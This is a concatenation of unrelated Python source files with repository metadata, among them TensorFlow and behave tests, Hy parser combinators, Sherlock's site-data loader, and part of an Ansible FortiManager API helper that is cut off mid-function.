}))
serialized_examples.append(example.SerializeToString())
feature_spec = {
'x': tf.io.FixedLenFeature([input_dimension], tf.dtypes.float32),
'y': tf.io.FixedLenFeature([1], tf.dtypes.int64),
}
def _train_input_fn():
feature_map = tf.compat.v1.io.parse_example(serialized_examples, feature_spec)
features = queue_parsed_features(feature_map)
labels = features.pop('y')
return features, labels
def _eval_input_fn():
feature_map = tf.compat.v1.io.parse_example(
tf.compat.v1.train.limit_epochs(serialized_examples, num_epochs=1),
feature_spec)
features = queue_parsed_features(feature_map)
labels = features.pop('y')
return features, labels
def _predict_input_fn():
feature_map = tf.compat.v1.io.parse_example(
tf.compat.v1.train.limit_epochs(serialized_examples, num_epochs=1),
feature_spec)
features = queue_parsed_features(feature_map)
features.pop('y')
return features, None
self._test_complete_flow(
n_classes=n_classes,
train_input_fn=_train_input_fn,
eval_input_fn=_eval_input_fn,
predict_input_fn=_predict_input_fn,
input_dimension=input_dimension,
prediction_length=prediction_length)
def test_binary_classes_input_fn_from_parse_example(self):
self._test_input_fn_from_parse_example(n_classes=2)
def test_multi_classes_input_fn_from_parse_example(self):
self._test_input_fn_from_parse_example(n_classes=4)
# Tests for Baseline logit_fn.
class BaselineLogitFnTest(tf.test.TestCase):
def test_basic_logit_correctness(self):
"""baseline_logit_fn simply returns the bias variable."""
with tf.Graph().as_default():
bias_var, logits = baseline._baseline_model_fn_builder_v2(
features={'age': [[23.], [31.]]}, num_outputs=2)
with tf.compat.v1.Session() as sess:
sess.run([tf.compat.v1.initializers.global_variables()])
self.assertAllClose([[0., 0.], [0., 0.]], logits.eval())
sess.run(bias_var[0].assign([10., 5.]))
self.assertAllClose([[10., 5.], [10., 5.]], logits.eval())
if __name__ == '__main__':
tf.test.main()
| 35.51297 | 88 | 0.673089 |
4a226a6340a329ba5eaf5f09d74f2c382ff19cfe | 516 | py | Python | tests/r/test_swahili.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | ["Apache-2.0"] | 199 | 2017-07-24T01:34:27.000Z | 2022-01-29T00:50:55.000Z | tests/r/test_swahili.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | ["Apache-2.0"] | 46 | 2017-09-05T19:27:20.000Z | 2019-01-07T09:47:26.000Z | tests/r/test_swahili.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | ["Apache-2.0"] | 45 | 2017-07-26T00:10:44.000Z | 2022-03-16T20:44:59.000Z |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.swahili import swahili
def test_swahili():
"""Test module swahili.py by downloading
swahili.csv and testing shape of
extracted data has 480 rows and 4 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = swahili(test_path)
try:
assert x_train.shape == (480, 4)
except:
shutil.rmtree(test_path)
    raise
| 21.5 | 44 | 0.753876 |
4a226a66ab50608c545fc92284572a25b14e351d | 7,845 | py | Python | iperflexer/tests/steps/binaryunitconverter.py | rsnakamura/iperflexer | 68f6ac5b3833e0053d6a5ca87bdb605ebbe6e665 | ["MIT"] | null | null | null | iperflexer/tests/steps/binaryunitconverter.py | rsnakamura/iperflexer | 68f6ac5b3833e0053d6a5ca87bdb605ebbe6e665 | ["MIT"] | null | null | null | iperflexer/tests/steps/binaryunitconverter.py | rsnakamura/iperflexer | 68f6ac5b3833e0053d6a5ca87bdb605ebbe6e665 | ["MIT"] | null | null | null |
# python standard library
import random
# third party
from behave import given, when, then
from hamcrest import assert_that, is_, close_to
# this package
from iperflexer.unitconverter import BinaryUnitconverter, BinaryUnitNames
BYTE = 8
BASE = 2
DELTA = 0.0001
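# Illustrative identity behind the scenarios below (added for clarity, not
# part of the original steps): converter[A][B] is the multiplicative factor
# that takes a value in unit A to unit B, so a round trip multiplies out to 1:
#
#   factor = BinaryUnitconverter()[BinaryUnitNames.bytes][BinaryUnitNames.bits]
#   inverse = BinaryUnitconverter()[BinaryUnitNames.bits][BinaryUnitNames.bytes]
#   assert abs(factor * inverse - 1.0) < DELTA    # 8 * (1/8) == 1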
@given('a BinaryUnitconverter')
def binaryunitconverter(context):
context.converter = BinaryUnitconverter()
print(context.converter.keys())
return
@when("the user converts from bytes to bits and back")
def bytes_to_bits(context):
context.source = random.randrange(100)
context.expected = context.source * BYTE
context.outcome = context.source * context.converter[BinaryUnitNames.bytes][BinaryUnitNames.bits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.bits][BinaryUnitNames.bytes]
return
@then("the outcome is the correct conversion")
def assert_bits(context):
assert_that(context.outcome,
is_(close_to(value=context.expected,
delta=DELTA)))
assert_that(context.reverse_outcome,
is_(close_to(value=context.source,
delta=DELTA)))
return
@when('the user converts from bits to bytes')
def step_implementation(context):
context.bits = random.randrange(100)
context.expected = context.bits/8.
context.outcome = context.bits * context.converter[BinaryUnitNames.bits][BinaryUnitNames.bytes]
return
@when('the user converts from kibibytes to bits and back')
def step_implementation(context):
context.source = random.randrange(100)
context.expected = context.source * 8 * (2**10)
context.outcome = context.source * context.converter[BinaryUnitNames.kibibytes][BinaryUnitNames.bits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.bits][BinaryUnitNames.kibibytes]
return
@when('the user converts from bits to bits and back')
def step_implementation(context):
context.source = random.randrange(100)
context.expected = context.source
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.bits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.bits][BinaryUnitNames.bits]
return
@when('the user converts from bits to mebibits and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (2.**20)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.mebibits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.mebibits][BinaryUnitNames.bits]
return
@when('the user converts from bits to gibibits and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (2.**30)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.gibibits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.gibibits][BinaryUnitNames.bits]
return
@when('the user converts from bits to mebibytes and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (8 * 2.**20)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.mebibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.mebibytes][BinaryUnitNames.bits]
return
@when('the user converts from bits to gibibytes and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (8 * 2.**30)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.gibibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.gibibytes][BinaryUnitNames.bits]
return
@when('the user converts from bits to tebibytes and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (8 * 2.**40)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.tebibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.tebibytes][BinaryUnitNames.bits]
return
@when('the user converts from bits to pebibits and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (2.**50)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.pebibits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.pebibits][BinaryUnitNames.bits]
return
@when('the user converts from bits to pebibytes and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (8 * 2.**50)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.pebibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.pebibytes][BinaryUnitNames.bits]
return
@when('the user converts from bits to exbibits and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (2.**60)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.exbibits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.exbibits][BinaryUnitNames.bits]
return
@when('the user converts from bits to exbibytes and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (8 * 2.**60)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.exbibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.exbibytes][BinaryUnitNames.bits]
return
@when('the user converts from bits to zebibits and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (2.**70)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.zebibits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.zebibits][BinaryUnitNames.bits]
return
@when('the user converts from bits to zebibytes and back')
def step_implementation(context):
context.source = random.randrange(100000)
context.expected = context.source / (8 * 2.**70)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.zebibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.zebibytes][BinaryUnitNames.bits]
return
@when('the user converts from bits to yobibits and back')
def step_implementation(context):
# the inputs need to be much larger to effectively test this
context.source = random.randrange(10**10, 10**30)
context.expected = context.source / (2.**80)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.yobibits]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.yobibits][BinaryUnitNames.bits]
return
@when('the user converts from bits to yobibytes and back')
def step_implementation(context):
context.source = random.randrange(10**20, 10**30)
context.expected = context.source / (8 * 2.**80)
context.outcome = context.source * context.converter[BinaryUnitNames.bits][BinaryUnitNames.yobibytes]
context.reverse_outcome = context.outcome * context.converter[BinaryUnitNames.yobibytes][BinaryUnitNames.bits]
return
| 41.951872 | 114 | 0.758445 |
4a226b098fa9492ca56b1c0f1dfd5acbcaef70b3 | 73 | py | Python | packages/jet_django/jet_django/__init__.py | loftwah/jet-bridge | b352d6514b1cc44d4d870966fa9f94afdf446096 | ["MIT"] | null | null | null | packages/jet_django/jet_django/__init__.py | loftwah/jet-bridge | b352d6514b1cc44d4d870966fa9f94afdf446096 | ["MIT"] | null | null | null | packages/jet_django/jet_django/__init__.py | loftwah/jet-bridge | b352d6514b1cc44d4d870966fa9f94afdf446096 | ["MIT"] | null | null | null |
VERSION = '0.9.1'
default_app_config = 'jet_django.apps.JetDjangoConfig'
| 24.333333 | 54 | 0.780822 |
4a226b2d01ca2b7063b231bc711ca451eec7e5d2 | 3,199 | py | Python | hy/model_patterns.py | datschy/hy | 2c5c7d657648d65c59f045d10a53773eba1a5d76 | ["MIT"] | null | null | null | hy/model_patterns.py | datschy/hy | 2c5c7d657648d65c59f045d10a53773eba1a5d76 | ["MIT"] | null | null | null | hy/model_patterns.py | datschy/hy | 2c5c7d657648d65c59f045d10a53773eba1a5d76 | ["MIT"] | null | null | null |
# Copyright 2021 the authors.
# This file is part of Hy, which is free software licensed under the Expat
# license. See the LICENSE.
"Parser combinators for pattern-matching Hy model trees."
from hy.models import HyExpression, HySymbol, HyKeyword, HyString, HyList
from funcparserlib.parser import (
some, skip, many, finished, a, Parser, NoParseError, State)
from functools import reduce
from itertools import repeat
from collections import namedtuple
from operator import add
from math import isinf
FORM = some(lambda _: True)
SYM = some(lambda x: isinstance(x, HySymbol))
KEYWORD = some(lambda x: isinstance(x, HyKeyword))
STR = some(lambda x: isinstance(x, HyString))
def sym(wanted):
"Parse and skip the given symbol or keyword."
if wanted.startswith(":"):
return skip(a(HyKeyword(wanted[1:])))
return skip(some(lambda x: isinstance(x, HySymbol) and x == wanted))
def whole(parsers):
"""Parse the parsers in the given list one after another, then
expect the end of the input."""
if len(parsers) == 0:
return finished >> (lambda x: [])
if len(parsers) == 1:
return parsers[0] + finished >> (lambda x: x[:-1])
return reduce(add, parsers) + skip(finished)
def _grouped(group_type, parsers): return (
some(lambda x: isinstance(x, group_type)) >>
(lambda x: group_type(whole(parsers).parse(x)).replace(x, recursive=False)))
def brackets(*parsers):
"Parse the given parsers inside square brackets."
return _grouped(HyList, parsers)
def pexpr(*parsers):
"Parse the given parsers inside a parenthesized expression."
return _grouped(HyExpression, parsers)
def dolike(head):
"Parse a `do`-like form."
return pexpr(sym(head), many(FORM))
def notpexpr(*disallowed_heads):
"""Parse any object other than a HyExpression beginning with a
HySymbol equal to one of the disallowed_heads."""
return some(lambda x: not (
isinstance(x, HyExpression) and
x and
isinstance(x[0], HySymbol) and
x[0] in disallowed_heads))
def unpack(kind):
"Parse an unpacking form, returning it unchanged."
return some(lambda x:
isinstance(x, HyExpression)
and len(x) > 0
and isinstance(x[0], HySymbol)
and x[0] == "unpack-" + kind)
def times(lo, hi, parser):
"""Parse `parser` several times (`lo` to `hi`) in a row. `hi` can be
float('inf'). The result is a list no matter the number of instances."""
@Parser
def f(tokens, s):
result = []
for _ in range(lo):
(v, s) = parser.run(tokens, s)
result.append(v)
end = s.max
try:
for _ in (repeat(1) if isinf(hi) else range(hi - lo)):
(v, s) = parser.run(tokens, s)
result.append(v)
except NoParseError as e:
end = e.state.max
return result, State(s.pos, end)
return f
Tag = namedtuple('Tag', ['tag', 'value'])
def tag(tag_name, parser):
"""Matches the given parser and produces a named tuple `(Tag tag value)`
with `tag` set to the given tag name and `value` set to the parser's
value."""
return parser >> (lambda x: Tag(tag_name, x))
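if __name__ == "__main__":
    # Minimal usage sketch (hand-built models, not part of the library): match a
    # `(setv <symbol> <form>)` expression and keep only the two payload items.
    # The printed result should be a HyExpression holding [HySymbol('x'), HyString('1')].
    demo = HyExpression([HySymbol("setv"), HySymbol("x"), HyString("1")])
    print(pexpr(sym("setv"), SYM, FORM).parse([demo]))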
| 33.673684 | 80 | 0.649265 |
4a226b4f5f239385de995bd2182b5d25a9b2d7fc | 8,764 | py | Python | sherlock/sites.py | Ahzaam/sherlock | e8c638d0ad48baa858927e7ed9614cf2f6ca9d1d | [
"MIT"
] | null | null | null | sherlock/sites.py | Ahzaam/sherlock | e8c638d0ad48baa858927e7ed9614cf2f6ca9d1d | [
"MIT"
] | null | null | null | sherlock/sites.py | Ahzaam/sherlock | e8c638d0ad48baa858927e7ed9614cf2f6ca9d1d | [
"MIT"
] | null | null | null | """Sherlock Sites Information Module
This module supports storing information about web sites.
This is the raw data that will be used to search for usernames.
"""
import os
import json
import operator
import requests
import sys
class SiteInformation():
def __init__(self, name, url_home, url_username_format, username_claimed,
username_unclaimed, information):
"""Create Site Information Object.
Contains information about a specific web site.
Keyword Arguments:
self -- This object.
name -- String which identifies site.
url_home -- String containing URL for home of site.
url_username_format -- String containing URL for Username format
on site.
NOTE: The string should contain the
token "{}" where the username should
be substituted. For example, a string
of "https://somesite.com/users/{}"
indicates that the individual
usernames would show up under the
"https://somesite.com/users/" area of
the web site.
username_claimed -- String containing username which is known
to be claimed on web site.
username_unclaimed -- String containing username which is known
to be unclaimed on web site.
information -- Dictionary containing all known information
about web site.
NOTE: Custom information about how to
actually detect the existence of the
username will be included in this
dictionary. This information will
be needed by the detection method,
but it is only recorded in this
object for future use.
Return Value:
Nothing.
"""
self.name = name
self.url_home = url_home
self.url_username_format = url_username_format
self.username_claimed = username_claimed
self.username_unclaimed = username_unclaimed
self.information = information
return
def __str__(self):
"""Convert Object To String.
Keyword Arguments:
self -- This object.
Return Value:
Nicely formatted string to get information about this object.
"""
return f"{self.name} ({self.url_home})"
class SitesInformation():
def __init__(self, data_file_path=None):
"""Create Sites Information Object.
Contains information about all supported web sites.
Keyword Arguments:
self -- This object.
data_file_path -- String which indicates path to data file.
The file name must end in ".json".
There are 3 possible formats:
* Absolute File Format
For example, "c:/stuff/data.json".
* Relative File Format
The current working directory is used
as the context.
For example, "data.json".
* URL Format
For example,
"https://example.com/data.json", or
"http://example.com/data.json".
An exception will be thrown if the path
to the data file is not in the expected
format, or if there was any problem loading
the file.
If this option is not specified, then a
default site list will be used.
Return Value:
Nothing.
"""
if data_file_path is None:
# The default data file is the live data.json which is in the GitHub repo. The reason why we are using
# this instead of the local one is so that the user has the most up to date data. This prevents
# users from creating issue about false positives which has already been fixed or having outdated data
data_file_path = "https://raw.githubusercontent.com/Ahzaam/sherlock/master/sherlock/resources/data.json"
# Ensure that specified data file has correct extension.
if not data_file_path.lower().endswith(".json"):
raise FileNotFoundError(f"Incorrect JSON file extension for data file '{data_file_path}'.")
if "http://" == data_file_path[:7].lower() or "https://" == data_file_path[:8].lower():
# Reference is to a URL.
try:
response = requests.get(url=data_file_path)
except Exception as error:
raise FileNotFoundError(f"Problem while attempting to access "
f"data file URL '{data_file_path}': "
f"{str(error)}"
)
if response.status_code == 200:
try:
site_data = response.json()
except Exception as error:
raise ValueError(f"Problem parsing json contents at "
f"'{data_file_path}': {str(error)}."
)
else:
raise FileNotFoundError(f"Bad response while accessing "
f"data file URL '{data_file_path}'."
)
else:
# Reference is to a file.
try:
with open(data_file_path, "r", encoding="utf-8") as file:
try:
site_data = json.load(file)
except Exception as error:
raise ValueError(f"Problem parsing json contents at "
f"'{data_file_path}': {str(error)}."
)
except FileNotFoundError as error:
raise FileNotFoundError(f"Problem while attempting to access "
f"data file '{data_file_path}'."
)
self.sites = {}
# Add all of site information from the json file to internal site list.
for site_name in site_data:
try:
self.sites[site_name] = \
SiteInformation(site_name,
site_data[site_name]["urlMain"],
site_data[site_name]["url"],
site_data[site_name]["username_claimed"],
site_data[site_name]["username_unclaimed"],
site_data[site_name]
)
except KeyError as error:
raise ValueError(f"Problem parsing json contents at "
f"'{data_file_path}': "
f"Missing attribute {str(error)}."
)
return
def site_name_list(self):
"""Get Site Name List.
Keyword Arguments:
self -- This object.
Return Value:
List of strings containing names of sites.
"""
site_names = sorted([site.name for site in self], key=str.lower)
return site_names
def __iter__(self):
"""Iterator For Object.
Keyword Arguments:
self -- This object.
Return Value:
Iterator for sites object.
"""
for site_name in self.sites:
yield self.sites[site_name]
def __len__(self):
"""Length For Object.
Keyword Arguments:
self -- This object.
Return Value:
Length of sites object.
"""
return len(self.sites)
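if __name__ == "__main__":
    # Usage sketch: pull the default (remote) data.json and show a few entries.
    # Requires network access; the default URL above is assumed to be reachable.
    sites = SitesInformation()
    print(f"{len(sites)} sites loaded")
    for name in sites.site_name_list()[:10]:
        print(name)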
| 40.762791 | 116 | 0.469991 |
4a226bbf840600d6206f548fa474a3d10e01d1af | 49,005 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/fortinet/fortimanager/plugins/module_utils/napi.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/fortinet/fortimanager/plugins/module_utils/napi.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/fortinet/fortimanager/plugins/module_utils/napi.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null |
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# (c) 2020-2021 Fortinet, Inc
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.basic import _load_params
import sys
import datetime
import yaml
def check_galaxy_version(schema):
params = _load_params()
params_keys = list(params.keys())
if 'method' in params_keys and 'method' not in schema:
error_message = 'Legacy playbook detected, please revise the playbook or install latest legacy'
error_message += ' fortimanager galaxy collection: #ansible-galaxy collection install -f fortinet.fortimanager:1.0.5'
sys.stderr.write(error_message)
sys.exit(1)
def check_parameter_bypass(schema, module_level2_name):
params = _load_params()
if 'bypass_validation' in params and params['bypass_validation'] is True:
top_level_schema = dict()
for key in schema:
if key != module_level2_name:
top_level_schema[key] = schema[key]
elif not params[module_level2_name] or type(params[module_level2_name]) is dict:
top_level_schema[module_level2_name] = dict()
top_level_schema[module_level2_name]['required'] = False
top_level_schema[module_level2_name]['type'] = 'dict'
elif type(params[module_level2_name]) is list:
top_level_schema[module_level2_name] = dict()
top_level_schema[module_level2_name]['required'] = False
top_level_schema[module_level2_name]['type'] = 'list'
else:
raise Exception('Value of %s must be a dict or list' % (module_level2_name))
return top_level_schema
return schema
class NAPIManager(object):
jrpc_urls = None
perobject_jrpc_urls = None
module_primary_key = None
url_params = None
module = None
conn = None
module_name = None
module_level2_name = None
top_level_schema_name = None
def __init__(self, jrpc_urls, perobject_jrpc_urls, module_primary_key, url_params, module, conn, top_level_schema_name=None):
self.jrpc_urls = jrpc_urls
self.perobject_jrpc_urls = perobject_jrpc_urls
self.module_primary_key = module_primary_key
self.url_params = url_params
self.module = module
self.conn = conn
self.process_workspace_lock()
self.module_name = self.module._name
self.module_level2_name = self.module_name.split('.')[-1][5:]
self.top_level_schema_name = top_level_schema_name
self.system_status = self.get_system_status()
self.version_check_warnings = list()
self._nr_exported_playbooks = 0
self._nr_valid_selectors = 0
def process_workspace_lock(self):
self.conn.process_workspace_locking(self.module.params)
def _method_proposed(self):
return 'proposed_method' in self.module.params and not not self.module.params['proposed_method']
def _propose_method(self, default_method):
if 'proposed_method' in self.module.params and self.module.params['proposed_method']:
return self.module.params['proposed_method']
return default_method
def _version_matched(self, revisions):
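        # Compare the running FortiManager version (taken from /cli/global/system/status)
        # against the module's {"x.y.z": supported} revision map and return a
        # (matched, message) pair; an unknown system version skips the check.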
if not revisions or not self.system_status:
# if system version is not determined, give up version checking
return True, None
sys_version_value = int(self.system_status['Major']) * 10000 + int(self.system_status['Minor']) * 100 + int(self.system_status['Patch'])
versions = list(revisions.keys())
versions.sort(key=lambda x: int(x.split('.')[0]) * 10000 + int(x.split('.')[1]) * 100 + int(x.split('.')[2]))
nearest_index = -1
for i in range(len(versions)):
version_value = int(versions[i].split('.')[0]) * 10000 + int(versions[i].split('.')[1]) * 100 + int(versions[i].split('.')[2])
if version_value <= sys_version_value:
nearest_index = i
if nearest_index == -1:
return False, 'not supported until in v%s' % (versions[0])
if revisions[versions[nearest_index]] is True:
return True, None
latest_index = -1
for i in range(nearest_index + 1, len(versions)):
if revisions[versions[i]] is True:
latest_index = i
break
earliest_index = nearest_index
while earliest_index >= 0:
if revisions[versions[earliest_index]] is True:
break
earliest_index -= 1
earliest_index = 0 if earliest_index < 0 else earliest_index
if latest_index == -1:
return False, 'not supported since v%s' % (versions[earliest_index])
else:
return False, 'not supported since %s, before %s' % (versions[earliest_index], versions[latest_index])
def _get_basic_url(self, is_perobject):
url_libs = None
if is_perobject:
url_libs = [i for i in self.perobject_jrpc_urls]
else:
url_libs = [i for i in self.jrpc_urls]
for uparam in self.url_params:
if not self.module.params[uparam]:
raise AssertionError('param %s MUST NOT be empty' % (uparam))
the_url = None
if 'adom' in self.url_params and not url_libs[0].endswith('{adom}'):
adom = self.module.params['adom']
if adom == 'global':
for url in url_libs:
if '/global/' in url:
the_url = url
break
if not the_url:
self.module.fail_json(msg='No global url for the request, please use other adom.')
else:
for url in url_libs:
if '/adom/{adom}/' in url:
the_url = url
break
if not the_url:
self.module.fail_json(msg='No url for the requested adom:%s, please use other adom.' % (adom))
else:
the_url = url_libs[0]
if not the_url:
raise AssertionError('the_url is not expected to be NULL')
_param_applied = list()
for uparam in self.url_params:
token_hint = '/%s/{%s}/' % (uparam, uparam)
token = '/%s/%s/' % (uparam, self.module.params[uparam])
if token_hint in the_url:
_param_applied.append(uparam)
the_url = the_url.replace(token_hint, token)
for uparam in self.url_params:
if uparam in _param_applied:
continue
token_hint = '{%s}' % (uparam)
token = self.module.params[uparam]
the_url = the_url.replace(token_hint, token)
return the_url
def _get_base_perobject_url(self, mvalue):
url_getting = self._get_basic_url(True)
if not url_getting.endswith('}'):
# in case of non-regular per-object url.
return url_getting
last_token = url_getting.split('/')[-1]
second_last_token = url_getting.split('/')[-2]
if last_token != '{' + second_last_token + '}':
raise AssertionError('wrong last_token received')
return url_getting.replace('{' + second_last_token + '}', str(mvalue))
def get_object(self, mvalue):
url_getting = self._get_base_perobject_url(mvalue)
params = [{'url': url_getting}]
response = self.conn.send_request('get', params)
return response
def update_object(self, mvalue):
url_updating = self._get_base_perobject_url(mvalue)
if not self.top_level_schema_name:
raise AssertionError('top level schema name MUST NOT be NULL')
params = [{'url': url_updating, self.top_level_schema_name: self.__tailor_attributes(self.module.params[self.module_level2_name])}]
response = self.conn.send_request(self._propose_method('update'), params)
return response
def create_objejct(self):
url_creating = self._get_basic_url(False)
if not self.top_level_schema_name:
raise AssertionError('top level schema name MUST NOT be NULL')
params = [{'url': url_creating, self.top_level_schema_name: self.__tailor_attributes(self.module.params[self.module_level2_name])}]
return self.conn.send_request(self._propose_method('set'), params)
def delete_object(self, mvalue):
url_deleting = self._get_base_perobject_url(mvalue)
params = [{'url': url_deleting}]
return self.conn.send_request('delete', params)
def get_system_status(self):
params = [{'url': '/cli/global/system/status'}]
response = self.conn.send_request('get', params)
if response[0] == 0:
if 'data' not in response[1]:
raise AssertionError()
return response[1]['data']
return None
def _compare_subnet(self, object_remote, object_present):
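        # FortiManager returns subnets as an [address, netmask] pair while playbooks
        # use CIDR "address/prefixlen"; returns True when the two differ (or cannot
        # be compared) and False when they describe the same subnet.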
if type(object_remote) is not list and len(object_remote) != 2:
return True
tokens = object_present.split('/')
if len(tokens) != 2:
return True
try:
subnet_number = int(tokens[1])
if subnet_number < 0 or subnet_number > 32:
return True
remote_subnet_number = sum(bin(int(x)).count('1') for x in object_remote[1].split('.'))
if object_remote[0] != tokens[0] or remote_subnet_number != subnet_number:
return True
else:
return False
except Exception as e:
return True
return True
def _check_object_difference(self, object_remote, object_present):
for key in object_present:
value = object_present[key]
if not value:
continue
if key not in object_remote or not object_remote[key]:
return True
value_type = type(value)
if value_type is list:
return True
elif value_type is dict:
if type(object_remote[key]) is not dict:
return True
elif self._check_object_difference(object_remote[key], value):
return True
else:
value_string = str(value)
if type(object_remote[key]) is not list and str(object_remote[key]) != value_string:
return True
elif type(object_remote[key]) is list:
if not self._compare_subnet(object_remote[key], value_string):
return False
elif len(object_remote[key]) > 1 or str(object_remote[key][0]) != value_string:
return True
return False
def _update_required(self, robject):
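        # Decide whether an update call is needed by diffing the object fetched
        # from FortiManager against the desired playbook parameters; only drift
        # in parameters the playbook actually sets counts as a difference.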
object_status = robject[0]
if object_status != 0:
return False
object_remote = robject[1]['data']
object_present = self.module.params[self.module_level2_name]
return self._check_object_difference(object_remote, object_present)
def _process_with_mkey(self, mvalue):
mobject = self.get_object(mvalue)
update_required = self._update_required(mobject)
if self._method_proposed():
update_required = True
if self.module.params['state'] == 'present':
if mobject[0] == 0:
if update_required:
return self.update_object(mvalue)
else:
self.module.exit_json(message='Object update skipped!')
else:
return self.create_objejct()
elif self.module.params['state'] == 'absent':
# in case the `GET` method returns nothing... see module `fmgr_antivirus_mmschecksum`
# if mobject[0] == 0:
return self.delete_object(mvalue)
# else:
# self.do_nonexist_exit()
else:
raise AssertionError('Not Reachable')
def _process_without_mkey(self):
if self.module.params['state'] == 'absent':
            self.module.fail_json(msg='this module does not support state:absent because it has no primary key.')
return self.create_objejct()
def process_generic(self, method, param):
response = self.conn.send_request(method, param)
self.do_exit(response)
def process_exec(self, argument_specs=None):
track = [self.module_level2_name]
if 'bypass_validation' not in self.module.params or self.module.params['bypass_validation'] is False:
self.check_versioning_mismatch(track,
argument_specs[self.module_level2_name] if self.module_level2_name in argument_specs else None,
self.module.params[self.module_level2_name] if self.module_level2_name in self.module.params else None)
the_url = self.jrpc_urls[0]
if 'adom' in self.url_params and not self.jrpc_urls[0].endswith('{adom}'):
if self.module.params['adom'] == 'global':
for _url in self.jrpc_urls:
if '/global/' in _url:
the_url = _url
break
else:
for _url in self.jrpc_urls:
if '/adom/{adom}/' in _url:
the_url = _url
break
for _param in self.url_params:
token_hint = '{%s}' % (_param)
token = '%s' % (self.module.params[_param])
the_url = the_url.replace(token_hint, token)
api_params = [{'url': the_url}]
if self.module_level2_name in self.module.params:
if not self.top_level_schema_name:
raise AssertionError('top level schema name MUST NOT be NULL')
api_params[0][self.top_level_schema_name] = self.__tailor_attributes(self.module.params[self.module_level2_name])
response = self.conn.send_request('exec', api_params)
self.do_exit(response)
def __extract_renamed_urls(self, urls):
_param_set = list()
for url in urls:
tokens = url.split('/')
if len(tokens) < 2:
